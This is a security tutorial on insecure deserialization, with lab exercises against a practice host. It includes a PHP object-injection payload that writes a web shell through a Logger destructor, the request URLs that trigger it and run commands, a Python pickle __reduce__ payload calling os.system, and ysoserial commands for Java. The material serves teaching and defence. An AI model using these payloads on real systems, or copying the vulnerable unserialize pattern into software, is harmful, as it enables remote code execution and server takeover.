# Dangerous deserialization
Deserialization is one of the most serious errors in current applications. This is evidenced primarily by the multitude of errors or the first bug hunter who earned over a million dollars in one year using this type of error. 
Additionally, deserialization is often not an easy bug to exploit. While injection bugs are already well known among developers, deserialization remains a mystery to most developers. Not to mention effective defense against attacks based on deserialization. 
Another aspect is the very broad use of classes in the dangerous use of deserialization. This is just one of the main reasons why you should focus on this type of errors. The OWASP Top Ten 2021 is also worth bringing up here. It classifies deserialization in one of the categories: "Software and Data Integrity Failures A08:2021".

## What is serialization and deserialization?
Serialization is an operation that turns objects into a sequence of bytes that can be retrieved at a later time. 
Therefore, the main functionality is the ability to easily transfer objects in the form of, for example, text. From a programming point of view, it is a very useful functionality. Unfortunately, it often carries a risk that can even lead to hijacking the server.
Deserialization often means security bugs, when replacing text with objects. Due to the fact that deserialization looks a bit different in each language, I will briefly go through some popular languages and explain bugs related to this functionality.
It is worth noting that due to the structure and presentation in the form of encoding, data serialization can often be quickly recognized. First of all, objects written in a specific way, especially at the beginning, and then encoded with Base64, leave a trace, which has no impact on security, but allows you to recognize whether we are dealing with a serialized object and in what language the object is compiled.
I will also deal with this topic later when I describe serialization in different languages.

## Gadget chains in deserialization
As it is the case with SSTI, sometimes the currently used object cannot be used in deserialization. Therefore, people have come up with tools that allow, in most cases, to create the so-called gadget chain, i.e. referring to many classes so as to finally get access to a method that allows you to, for example, read a file or execute commands in the system.

## Deserialization in PHP, i.e. PHP Object Injection
In PHP I will primarily focus on two methods
```php
serialize()
unserialize()
```
The `unserialize` method is obviously the most interesting. Despite having already been marked as dangerous in [PHP documentation](https://www.php.net/manual/en/function.unserialize.php), it is very often used. However, before I deal with the theoretical explanation of vulnerabilities, I will present what a class in PHP looks like, how serialization is used and what serialized data looks like.
```php
<?php
    // /src/vuln/deserialization/deserialize.php
    class Course {// class definition named Course
        public $name; // Course class attribute
        
        function __construct ($name) { // Course class Constructor
            $this->name = $name; // assign to $name attribute of the content specified when creating the object
        }
    }
    $obj = new Course("Test"); // Create Object Using Defined Constructor
    $serobj = serialize($obj);
    echo "$serobj\n\n"; // Serialize the object to a byte string and display it
    var_dump(unserialize($serobj)); // and this is a dangerous use of the unserialize function, var_dump lets you find out a little more about deserialized data
?>
```
Now all you need to do is execute the PHP code, e.g.
```sh
php src/vuln/deserialization/deserialize.php
```
Code result:
```php
O:6:"Course":1:{s:4:"name";s:4:"Test";}

object(Course)#2 (1) {
  ["name"]=>
  string(4) "Test"
}
```

The first line contains a sequence of bytes representing the serialized object, and the following lines contain the deserialized object.
By carefully analyzing a serialized object, you can easily see that there is no magic to it, but simple notation to help write down the objects.
Starting from the left, "O" refers to an object then 6:"Course" refers to a class with a length of six characters and named Course. Then "1" means one field in the class, that is one attribute, and in it two attributes with a length of 4 and with selected names. The "s" stands for a string. 
Note that only the fields of the class have been deserialized, but not the methods.
As you can see, serialization is quite simple. Since methods are not saved and thus called, it will be difficult to use only attributes. 
Fortunately, in PHP there are so-called "magic methods" - methods that execute under specific conditions.
```php
__wakeup () # called after the object is deserialized
__destruct () # called after the end of the object’s life
```
and many more. However, these are the ones that are most often used.
Anticipating the facts, the `__wakeup` method will not execute for reasons that I will try to clarify later. However, the `__destruct` method will be executed in the vast majority of cases.
In short, if the code contains the `unserialize` function, which is dangerous and due to the very specificity of the language, the` __destruct` method is called in the vast majority of cases, then the exploitation of the deserialization vulnerability is almost certainly possible. Sometimes, however, it is impossible to use magic methods, then you should base your exploits on other methods, which are very common, e.g. in other PHP libraries.
I mentioned a moment ago about checking if the vulnerability is not present in the source code, but in almost every case there will be no access to the source code. Therefore, unfortunately, you often have to shoot blindly and provide malicious data, hoping that you will be able to use it. This is the main difficulty in using deserialization.

## Exercise: Deserialization in PHP, use of vulnerabilities
Now let’s try to take advantage of the class and weakness of the `unserialize` function to execute any RCE code. Suppose there's a following PHP code on the back-end of some web application.

http://vuln.vms.perkmylife.com:82/deserialize-logger.php
```php
<?php
// /src/vuln/deserialization/deserialize-logger.php
class Logger {
    function __construct($filename, $content) {
        $this->filename = $filename . ".log";
        $this->content = $content;
    }
    
    function __destruct() {
        file_put_contents($this->filename, $this->content);
    }
}

unserialize($_GET['data']);
?>
```
The Logger class in the constructor sets the file with the log extension and its contents - most likely logs. The destructor saves the content to files. The purpose of this task is to save malicious PHP code to a .php file.
To do this, you need to change the class parameters and send such a malicious object to the application.
Let's start by creating a class with malicious data
```php
<?php
// /src/vuln/deserialization/deserialize-logger-exploit.php
class Logger {
    public $filename = "shell.php";
    public $content = "<?php system (\$_GET['cmd']) ?>";
}
```
Now we need to create a class object, serialize it, and output it. So we add a few lines
```php
<?php
// /src/vuln/deserialization/deserialize-logger-exploit.php
class Logger {
    public $filename = "shell.php";
    public $content = "<?php system (\$_GET['cmd']) ?>";
}

$obj = new Logger();
echo serialize($obj);
?>
```
`php /var/www/vuln/deserialization/deserialize-logger-exploit.php`

We can paste such a serialized object in the data parameter, send it to the site:
http://vuln.vms.perkmylife.com:82/deserialize-logger.php served by based on the file:
`src/vuln/deserialization/deserialize-logger.php` and enjoy the RCE!

```haskell
# Injecting an exploit into a data parameter which is passed to vulnerable unserialize($_GET['data']); method
http://vuln.vms.perkmylife.com:82/deserialize-logger.php?data=O:6:"Logger":2:{s:8:"filename";s:9:"shell.php";s:7:"content";s:30:"<?php system ($_GET['cmd']) ?>";}

# Reading the output of the Remotely Executed Command ls -la
http://vuln.vms.perkmylife.com:82/shell.php?cmd=ls%20-la%20*
```

## Exercise: Deserialization in Python
Deserialization in Python works in a similar way to deserialization in PHP. Primarily, Python uses the following methods:
```python
dumps () # returns a serialized object
loads () # returns a deserialized object
```
Note that a serialized object in Python is binary, not text, as was the case with PHP. Therefore, often such strings are encoded in Base64.
The following is an example of using serialization in Python:
```py
# /src/vuln/deserialize.py
import pickle, datetime # Import needed modules

now = datetime.datetime.now () # Returning the current date
serialized_object = pickle.dumps(now) # Serializing the object

print(serialized_object) # Display a serialized object

unserialized_object = pickle.loads(serialized_object) # Object deserialization

print (unserialized_object) # Display the deserialized object
```

As in PHP, we can create a malicious object:
```py
# /src/vuln/deserialization/deserialize2.py
import pickle, os, base64

class MaliciousObject(object):
    def __reduce__(self):
        return (os.system, ("id",))

print(base64.b64encode(pickle.dumps(MaliciousObject())))
```
Now the object executes the `id` command so we control the server. 
Finally to see the output of our exploitation, let's only pass the base64 serialized object as the first argument of this program:
```py
# /src/vuln/deserialization/deserialize-output.py
import pickle, sys, base64

data = pickle.loads(base64.b64decode(sys.argv[1]))
```
As you can see in Python, it is enough to create any class where in PHP the class had to map the original one.

## Deserialization in Java
Data serialized in Java are in binary form, which requires the use of Base64 encoding in many situations. As in other languages, Java also has methods for serializing and deserializing objects, in order:
```java
writeObject()
readObject()
```
In the case of Java, it is not possible to inject properly crafted objects as in PHP, or any objects as in Python. 

In the case of Java, the situation is a bit more difficult. In PHP, the so-called gadget chains I have already mentioned are usually used to attack. However, in the case of Java, the most commonly used tool is [ysoserial](https://github.com/frohoff/ysoserial), which can create exploits for various Java libraries. The big advantage is that most of these Java libraries are used on a daily basis, because you need to know that there is no effective Java gadget chain. Therefore, any attack on a deserialization function in Java will rely on libraries that often co-exist with Java.
```sh
git clone https://github.com/frohoff/ysoserial
```
Using ysoserial is simple:
```haskell
java -jar ysoserial.jar [ library ] [ cmd ]
// For example
java -jar ysoserial.jar CommonsCollections1 id
```
Of course, it’s worth trying to attack with other libraries until you succeed.

## Exercise:
On the host
```haskell
http://vuln.vms.perkmylife.com:82
```
you can find an exercise that uses the class:
```php
<?php
class Logger {
    function __construct($filename, $content) {
        $this->filename = $filename . ".log";
        $this->content = $content;
    }
    
    function __destruct() {
        file_put_contents($this->filename, $this->content);
    }
}

$testobj = new Logger("test", "content");
?>
```
For saving logs. The object is served in a cookie. Knowing this information, try to take control of the server, i.e. by executing any command in the terminal.
Tip:
In order to comply with the data, the malicious object should be encoded in Base64